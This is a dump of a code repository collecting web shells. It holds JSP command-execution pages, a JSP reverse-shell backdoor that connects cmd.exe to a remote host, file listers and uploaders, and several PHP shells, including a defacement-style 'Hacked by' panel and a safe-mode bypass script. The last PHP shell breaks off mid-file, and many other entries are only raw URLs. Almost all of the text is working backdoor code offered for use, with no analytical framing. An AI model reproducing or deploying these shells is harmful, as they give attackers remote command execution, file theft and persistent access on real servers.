File(DPATH+filename); 115 | fout = new FileOutputStream( newfile ); 116 | }catch(FileNotFoundException fnexp){ 117 | fin.close(); 118 | return; 119 | } 120 | 121 | byte b[] = null; 122 | while(l > 1024L){ 123 | b = new byte[1024]; 124 | fin.read(b,0,1024); 125 | fout.write(b); 126 | b=null; 127 | l -= 1024L; 128 | } 129 | if(l > 0){ 130 | b = new byte[(int)l]; 131 | fin.read(b,0,(int)l); 132 | fout.write(b); 133 | } 134 | 135 | 136 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 137 | while((c = fin.read()) != -1){ 138 | baos.write(c); 139 | } 140 | String laststring = baos.toString(); 141 | int idx = laststring.indexOf(boundary); 142 | b = baos.toByteArray(); 143 | if(idx > 2){ 144 | fout.write(b,0,idx-2); 145 | }else{ 146 | fout.close(); 147 | newfile.delete(); 148 | return; 149 | } 150 | fout.flush(); 151 | fout.close(); 152 | fin.close(); 153 | 154 | out.println("FileName: " + newfile.getName()); 155 | out.println("FileSize: " + newfile.length()); 156 | 157 | %> 158 | 159 | 160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /JSP/JspWebshell 1.2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/JSP/JspWebshell 1.2.jsp -------------------------------------------------------------------------------- /JSP/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (unix) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "
    "); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 |
    33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /JSP/cmd_win32.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (win32) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "\n
    "); 21 | Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); disr = dis.readLine(); } 28 | } 29 | %> 30 |
    31 | -------------------------------------------------------------------------------- /JSP/jspbd.jsp: -------------------------------------------------------------------------------- 1 | // backdoor.jsp 2 | < %@ 3 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 4 | % > 5 | < %! 6 | static class StreamConnector extends Thread 7 | { 8 | InputStream is; 9 | OutputStream os; 10 | 11 | StreamConnector(InputStream is, OutputStream os) 12 | { 13 | this.is = is; 14 | this.os = os; 15 | } 16 | 17 | public void run() 18 | { 19 | BufferedReader isr = null; 20 | BufferedWriter osw = null; 21 | 22 | try 23 | { 24 | isr = new BufferedReader(new InputStreamReader(is)); 25 | osw = new BufferedWriter(new OutputStreamWriter(os)); 26 | 27 | char buffer[] = new char[8192]; 28 | int lenRead; 29 | 30 | while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) 31 | { 32 | osw.write(buffer, 0, lenRead); 33 | osw.flush(); 34 | } 35 | } 36 | catch (Exception ioe) 37 | 38 | try 39 | { 40 | if(isr != null) isr.close(); 41 | if(osw != null) osw.close(); 42 | } 43 | catch (Exception ioe) 44 | } 45 | } 46 | % > 47 | 48 |

    JSP Backdoor Reverse Shell

    49 | 50 |
    51 | IP Address 52 | 53 | Port 54 | 55 | 56 |
    57 |

    58 |


    59 | 60 | < % 61 | String ipAddress = request.getParameter("ipaddress"); 62 | String ipPort = request.getParameter("port"); 63 | 64 | if(ipAddress != null && ipPort != null) 65 | { 66 | Socket sock = null; 67 | try 68 | { 69 | sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); 70 | 71 | Runtime rt = Runtime.getRuntime(); 72 | Process proc = rt.exec("cmd.exe"); 73 | 74 | StreamConnector outputConnector = 75 | new StreamConnector(proc.getInputStream(), 76 | sock.getOutputStream()); 77 | 78 | StreamConnector inputConnector = 79 | new StreamConnector(sock.getInputStream(), 80 | proc.getOutputStream()); 81 | 82 | outputConnector.start(); 83 | inputConnector.start(); 84 | } 85 | catch(Exception e) 86 | } 87 | % > 88 | -------------------------------------------------------------------------------- /JSP/list.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // list.jsp = Directory & File View 7 | // 8 | // by: Sierra 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | <% 13 | if(request.getParameter("file")==null) { 14 | %> 15 | 16 |
    17 | 18 | 19 |
    20 | <% 21 | } 22 | %> 23 | <% //read the file name. 24 | try { 25 | File f = new File(request.getParameter("file")); 26 | if(f.isDirectory()) { 27 | int i; 28 | String fname = new String("Unknown"); 29 | String fcolor = new String("Black"); 30 | %> 31 | 32 | 33 | <% 34 | out.print("Path: " + f.toString() + "

    "); 35 | File flist[] = f.listFiles(); 36 | for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n"); 53 | } 54 | %> 55 |
    56 | <% 57 | 58 | } else { 59 | if(f.canRead() == true) { 60 | InputStream in = new FileInputStream(f); 61 | ServletOutputStream outs = response.getOutputStream(); 62 | int left = 0; 63 | try { 64 | while((left) >= 0 ) { 65 | left = in.read(); 66 | outs.write(left); 67 | } 68 | } catch(IOException ex) {ex.printStackTrace();} 69 | outs.flush(); 70 | outs.close(); 71 | in.close(); 72 | } else { 73 | out.print("Can't Read file
    "); 74 | } 75 | } 76 | } catch(Exception ex) {ex.printStackTrace();} 77 | %> -------------------------------------------------------------------------------- /JSP/up.jsp: -------------------------------------------------------------------------------- 1 | 2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> 3 | <% 4 | // 5 | // JSP_KIT 6 | // 7 | // up.jsp = File Upload (unix) 8 | // 9 | // by: Unknown 10 | // modified: 27/06/2003 11 | // 12 | %> 13 | 14 |
    15 | 16 | 17 |
    18 | 19 | <%! 20 | public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ 21 | String boundary = null; 22 | Enumeration enum = request.getHeaderNames(); 23 | while(enum.hasMoreElements()){ 24 | String header = (String)enum.nextElement(); 25 | String hvalue = request.getHeader(header); 26 | prop.setProperty((header).toLowerCase(),hvalue); 27 | if("content-type".equalsIgnoreCase(header) ){ 28 | int idx = hvalue.lastIndexOf("boundary="); 29 | if(idx != -1 ){ 30 | boundary= hvalue.substring(idx+9 , hvalue.length()); 31 | } 32 | } 33 | } 34 | return boundary; 35 | 36 | } 37 | public String getFileName(String secondline){ 38 | int len = secondline.length(); 39 | int idx = secondline.lastIndexOf("filename="); 40 | if(idx == -1 ) return null; 41 | String filename = secondline.substring(idx+10 , len-1); 42 | filename = filename.replace('\\','/'); 43 | idx = filename.lastIndexOf("/"); 44 | idx = idx + 1; 45 | filename = filename.substring( idx ); 46 | return filename; 47 | } 48 | %> 49 | <% 50 | String DPATH = "/tmp/"; 51 | int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks 52 | int MAXSIZE = 10; // 10 Mega Byte 53 | String boundary = getBoundary(request,prop); 54 | if(boundary == null ){ 55 | boundary = prop.getProperty("boundary"); 56 | }else{ 57 | boundary = "--"+boundary; 58 | } 59 | if(boundary == null ){ 60 | return; 61 | } 62 | Long contentsize = new Long(prop.getProperty("content-length","0")); 63 | int c; 64 | StringWriter st = new StringWriter(); 65 | if(contentsize.longValue() < 1L ){ 66 | return; 67 | } 68 | long l = contentsize.longValue() - ROUGHSIZE; 69 | int KB = 1024; 70 | int MB = 1024 * KB; 71 | int csize = (int)(l / MB); 72 | if(csize > MAXSIZE ){ 73 | return; 74 | } 75 | ServletInputStream fin = request.getInputStream(); 76 | int cn; 77 | int count=0; 78 | while((c=fin.read()) != -1 ){ 79 | if( c == '\r') break; 80 | st.write(c); 81 | count++; 82 | } 83 | c=fin.read(); 84 | String tboundary = st.getBuffer().toString(); 85 | tboundary=tboundary.trim(); 86 | if(! tboundary.equalsIgnoreCase( boundary) ){ 87 | return; 88 | } 89 | st.close(); 90 | st = null; 91 | st = new StringWriter(); 92 | while((c=fin.read()) != -1 ){ 93 | if( c == '\r' ) break; 94 | st.write(c); 95 | } 96 | c=fin.read(); 97 | String secondline = st.getBuffer().toString(); 98 | String filename = getFileName(secondline); 99 | st.close(); 100 | st = null; 101 | st = new StringWriter(); 102 | while((c=fin.read()) != -1 ){ 103 | if( c == '\r' ) break; 104 | st.write( c ); 105 | } 106 | c=fin.read(); 107 | 108 | fin.read(); 109 | fin.read(); 110 | File newfile = null; 111 | FileOutputStream fout =null; 112 | try{ 113 | if(filename == null) throw new FileNotFoundException("File Name not found"); 114 | newfile = new File(DPATH+filename); 115 | fout = new FileOutputStream( newfile ); 116 | }catch(FileNotFoundException fnexp){ 117 | fin.close(); 118 | return; 119 | } 120 | 121 | byte b[] = null; 122 | while(l > 1024L){ 123 | b = new byte[1024]; 124 | fin.read(b,0,1024); 125 | fout.write(b); 126 | b=null; 127 | l -= 1024L; 128 | } 129 | if(l > 0){ 130 | b = new byte[(int)l]; 131 | fin.read(b,0,(int)l); 132 | fout.write(b); 133 | } 134 | 135 | 136 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 137 | while((c = fin.read()) != -1){ 138 | baos.write(c); 139 | } 140 | String laststring = baos.toString(); 141 | int idx = laststring.indexOf(boundary); 142 | b = baos.toByteArray(); 143 | if(idx > 2){ 144 | fout.write(b,0,idx-2); 145 | }else{ 146 | fout.close(); 147 | newfile.delete(); 148 | return; 149 | } 150 | fout.flush(); 151 | fout.close(); 152 | fin.close(); 153 | 154 | out.println("FileName: " + newfile.getName()); 155 | out.println("FileSize: " + newfile.length()); 156 | 157 | %> 158 | 159 | 160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /JSP/up_win32.jsp: -------------------------------------------------------------------------------- 1 | 2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> 3 | <% 4 | // 5 | // JSP_KIT 6 | // 7 | // up.jsp = File Upload (win32) 8 | // 9 | // by: Unknown 10 | // modified: 27/06/2003 11 | // 12 | %> 13 | 14 |
    15 | 16 | 17 |
    18 | 19 | <%! 20 | public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ 21 | String boundary = null; 22 | Enumeration enum = request.getHeaderNames(); 23 | while(enum.hasMoreElements()){ 24 | String header = (String)enum.nextElement(); 25 | String hvalue = request.getHeader(header); 26 | prop.setProperty((header).toLowerCase(),hvalue); 27 | if("content-type".equalsIgnoreCase(header) ){ 28 | int idx = hvalue.lastIndexOf("boundary="); 29 | if(idx != -1 ){ 30 | boundary= hvalue.substring(idx+9 , hvalue.length()); 31 | } 32 | } 33 | } 34 | return boundary; 35 | 36 | } 37 | public String getFileName(String secondline){ 38 | int len = secondline.length(); 39 | int idx = secondline.lastIndexOf("filename="); 40 | if(idx == -1 ) return null; 41 | String filename = secondline.substring(idx+10 , len-1); 42 | filename = filename.replace('\\','/'); 43 | idx = filename.lastIndexOf("/"); 44 | idx = idx + 1; 45 | filename = filename.substring( idx ); 46 | return filename; 47 | } 48 | %> 49 | <% 50 | String DPATH = "c:\\"; 51 | int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks 52 | int MAXSIZE = 10; // 10 Mega Byte 53 | String boundary = getBoundary(request,prop); 54 | if(boundary == null ){ 55 | boundary = prop.getProperty("boundary"); 56 | }else{ 57 | boundary = "--"+boundary; 58 | } 59 | if(boundary == null ){ 60 | return; 61 | } 62 | Long contentsize = new Long(prop.getProperty("content-length","0")); 63 | int c; 64 | StringWriter st = new StringWriter(); 65 | if(contentsize.longValue() < 1L ){ 66 | return; 67 | } 68 | long l = contentsize.longValue() - ROUGHSIZE; 69 | int KB = 1024; 70 | int MB = 1024 * KB; 71 | int csize = (int)(l / MB); 72 | if(csize > MAXSIZE ){ 73 | return; 74 | } 75 | ServletInputStream fin = request.getInputStream(); 76 | int cn; 77 | int count=0; 78 | while((c=fin.read()) != -1 ){ 79 | if( c == '\r') break; 80 | st.write(c); 81 | count++; 82 | } 83 | c=fin.read(); 84 | String tboundary = st.getBuffer().toString(); 85 | tboundary=tboundary.trim(); 86 | if(! tboundary.equalsIgnoreCase( boundary) ){ 87 | return; 88 | } 89 | st.close(); 90 | st = null; 91 | st = new StringWriter(); 92 | while((c=fin.read()) != -1 ){ 93 | if( c == '\r' ) break; 94 | st.write(c); 95 | } 96 | c=fin.read(); 97 | String secondline = st.getBuffer().toString(); 98 | String filename = getFileName(secondline); 99 | st.close(); 100 | st = null; 101 | st = new StringWriter(); 102 | while((c=fin.read()) != -1 ){ 103 | if( c == '\r' ) break; 104 | st.write( c ); 105 | } 106 | c=fin.read(); 107 | 108 | fin.read(); 109 | fin.read(); 110 | File newfile = null; 111 | FileOutputStream fout =null; 112 | try{ 113 | if(filename == null) throw new FileNotFoundException("File Name not found"); 114 | newfile = new File(DPATH+filename); 115 | fout = new FileOutputStream( newfile ); 116 | }catch(FileNotFoundException fnexp){ 117 | fin.close(); 118 | return; 119 | } 120 | 121 | byte b[] = null; 122 | while(l > 1024L){ 123 | b = new byte[1024]; 124 | fin.read(b,0,1024); 125 | fout.write(b); 126 | b=null; 127 | l -= 1024L; 128 | } 129 | if(l > 0){ 130 | b = new byte[(int)l]; 131 | fin.read(b,0,(int)l); 132 | fout.write(b); 133 | } 134 | 135 | 136 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 137 | while((c = fin.read()) != -1){ 138 | baos.write(c); 139 | } 140 | String laststring = baos.toString(); 141 | int idx = laststring.indexOf(boundary); 142 | b = baos.toByteArray(); 143 | if(idx > 2){ 144 | fout.write(b,0,idx-2); 145 | }else{ 146 | fout.close(); 147 | newfile.delete(); 148 | return; 149 | } 150 | fout.flush(); 151 | fout.close(); 152 | fin.close(); 153 | 154 | out.println("FileName: " + newfile.getName()); 155 | out.println("FileSize: " + newfile.length()); 156 | 157 | %> 158 | 159 | 160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /PHP/.svn/prop-base/cmd.php.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PHP/.svn/prop-base/list.php.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PHP/.svn/prop-base/phpshell.php.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PHP/.svn/prop-base/up.php.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/2mv2.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/2mv2.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Crystal.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Crystal.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/CrystalShell v.1.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/CrystalShell v.1.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Cyber Shell (v 1.0).php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Cyber Shell (v 1.0).php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Dx.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Dx.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/DxShell.1.0.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/DxShell.1.0.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/FaTaLisTiCz_Fx.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/FaTaLisTiCz_Fx.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Fx29Sh.3.2.12.08.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Fx29Sh.3.2.12.08.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/G5.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/G5.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/GFS web-shell ver 3.1.7 - PRiV8.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/GFS web-shell ver 3.1.7 - PRiV8.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/KAdot Universal Shell v0.1.6.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/KAdot Universal Shell v0.1.6.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/KAdot Universal Shell v0.1.6.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/KAdot Universal Shell v0.1.6.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/NCC-Shell.txt.svn-base: -------------------------------------------------------------------------------- 1 |
    2 |

    .:NCC:. Shell v1.0.0

    3 | .:NCC:. Shell v1.0.0 4 |

    Hacked by Silver

    5 |

    ---------------------------------------------------------------------------------------


    6 | ---Server Info---
    7 | Safe Mode on/off: "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
    "; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
    "; 18 | echo "Server:
    "; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

    ---------------------------------------------------------------------------


    25 |

    - Upload -

    26 | Upload - Shell/Datei 27 |
    31 | 32 | 33 |
    34 |
    35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
    \n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

    ---------------------------------------------------------------------------


    47 |

    IpLogger

    48 |
    IP:
    "; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
    PORT:
    "; echo $_SERVER['REMOTE_PORT']; 51 | echo "
    BROWSER:
    "; echo $_SERVER[HTTP_REFERER]; 52 | echo "
    REFERER:
    "; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

    ---------------------------------------------------------------------------


    55 |

    Directory Lister

    56 |

    >

    57 |

    ---------------------------------------------------------------------------


    58 | --Coded by Silver©--
    59 | ~|_Team .:National Cracker Crew:._|~
    60 | -->NCC<--
    61 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/NetworkFileManagerPHP.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/NetworkFileManagerPHP.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/PH Vayv.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/PH Vayv.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/PHANTASMA.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/PHANTASMA.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/PHPRemoteView.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/PHPRemoteView.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/PHPSPY.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/PHPSPY.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Php_Backdoor.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Php_Backdoor.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Private-i3lue.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Private-i3lue.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Private-i3lue.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Private-i3lue.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/RedhatC99 [login=redhat-pass=root].svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/RedhatC99 [login=redhat-pass=root].svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Safe mode breaker.php.svn-base: -------------------------------------------------------------------------------- 1 | ".getcwd().""; 10 | 11 | echo "
    "; 12 | echo "
    Root directory:
    "; 13 | echo "
    "; 14 | 15 | echo "
    "; 16 | 17 | // break fucking safe-mode ! 18 | 19 | $root = "/"; 20 | 21 | if($_POST['root']) $root = $_POST['root']; 22 | 23 | if (!ini_get('safe_mode')) die("Safe-mode is OFF."); 24 | 25 | $c = 0; $D = array(); 26 | set_error_handler("eh"); 27 | 28 | $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 29 | 30 | for($i=0; $i < strlen($chars); $i++){ 31 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 32 | 33 | $prevD = $D[count($D)-1]; 34 | glob($path."*"); 35 | 36 | if($D[count($D)-1] != $prevD){ 37 | 38 | for($j=0; $j < strlen($chars); $j++){ 39 | 40 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 41 | 42 | $prevD2 = $D[count($D)-1]; 43 | glob($path."*"); 44 | 45 | if($D[count($D)-1] != $prevD2){ 46 | 47 | 48 | for($p=0; $p < strlen($chars); $p++){ 49 | 50 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 51 | 52 | $prevD3 = $D[count($D)-1]; 53 | glob($path."*"); 54 | 55 | if($D[count($D)-1] != $prevD3){ 56 | 57 | 58 | for($r=0; $r < strlen($chars); $r++){ 59 | 60 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 61 | glob($path."*"); 62 | 63 | } 64 | 65 | } 66 | 67 | } 68 | 69 | } 70 | 71 | } 72 | 73 | } 74 | 75 | } 76 | 77 | $D = array_unique($D); 78 | 79 | echo ""; 80 | foreach($D as $item) echo "{$item}\n"; 81 | echo ""; 82 | 83 | 84 | 85 | 86 | function eh($errno, $errstr, $errfile, $errline){ 87 | 88 | global $D, $c, $i; 89 | preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 90 | if($o){ $D[$c] = $o[2]; $c++;} 91 | 92 | } 93 | 94 | ?> -------------------------------------------------------------------------------- /PHP/.svn/text-base/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/SnIpEr_SA Shell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/SnIpEr_SA Shell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/Uploader.txt.svn-base: -------------------------------------------------------------------------------- 1 |
    2 | 3 | Send this file: 4 | 5 |
    6 | 9 | 10 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/Worse Linux Shell.php.svn-base: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

    #worst @dal.net

    "; 7 | print "

    You have been hack By Shany with Love To #worst.

    "; 8 | print "

    Watch Your system Shany was here.

    "; 9 | print "

    Linux Shells

    "; 10 | print "

    "; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
    We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
    Server is:".$_SERVER['SERVER_SIGNATURE']."
    System type:$UName
    Our permissions:$UserID
    "; 29 | 30 | print "

    "; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
